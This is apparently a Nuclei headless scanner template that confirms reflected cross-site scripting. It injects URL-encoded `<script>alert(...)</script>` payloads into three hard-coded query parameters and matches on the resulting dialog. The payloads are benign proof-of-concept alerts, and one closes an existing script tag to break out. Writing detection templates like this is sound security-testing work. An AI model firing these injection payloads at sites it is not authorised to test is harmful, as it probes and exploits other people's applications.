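id: headless-reflected-xss

info:
  name: Reflected Headless XSS
  author: yar0v1t
  severity: high
  description: |
    Reflected cross-site scripting confirmed by actually executing the payload
    in a headless browser rather than by looking for the string in the
    response. Each step injects `<script>alert(a+b)</script>` into a query
    parameter and waits for a JavaScript dialog; the DSL matcher then requires
    the dialog message to equal the arithmetic result, so a payload that is
    merely reflected (encoded, in a comment, etc.) without being executed does
    not produce a match. The three paths and parameter names are hard-coded to
    the application this template was written against and are not generic.
  tags: xss,headless

# NOTE(review): headless templates only run when nuclei is started in headless
# mode; confirm the `waitdialog` action's default timeout is acceptable for the
# target, since a slow page makes `<name> == true` evaluate false.
headless:
  # Step 1: `cat` is reflected inside an existing <script> block, so the payload
  # first closes that tag before opening its own. Expected dialog: 3+4 = 7.
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/listproducts.php?cat=1%3C%2Fscript%3E%3Cscript%3Ealert%283%2B4%29%3C%2Fscript%3E"
      - action: waitdialog
        name: reflected_cat_query
    matchers:
      - type: dsl
        dsl:
          - reflected_cat_query == true
          - reflected_cat_query_message == "7"  # 3+4
        condition: and

  # Step 2: second occurrence of a parameter (`p` valid, `pp` injected) is
  # reflected unencoded into HTML. Expected dialog: 1+1 = 2.
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/hpp/params.php?p=valid&pp=1%3Cscript%3Ealert%281%2B1%29%3C%2Fscript%3E"
      - action: waitdialog
        name: reflected_pp_query
    matchers:
      - type: dsl
        dsl:
          - reflected_pp_query == true
          - reflected_pp_query_message == "2"  # 1+1
        condition: and

  # Step 3: `topicId` is reflected directly into HTML. Expected dialog: 4+4 = 8.
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}/widgets/knowledgebase?topicId=%3Cscript%3Ealert%284%2B4%29%3C%2Fscript%3E"
      - action: waitdialog
        name: reflected_topicId_query
    matchers:
      - type: dsl
        dsl:
          - reflected_topicId_query == true
          - reflected_topicId_query_message == "8"  # 4+4
        condition: and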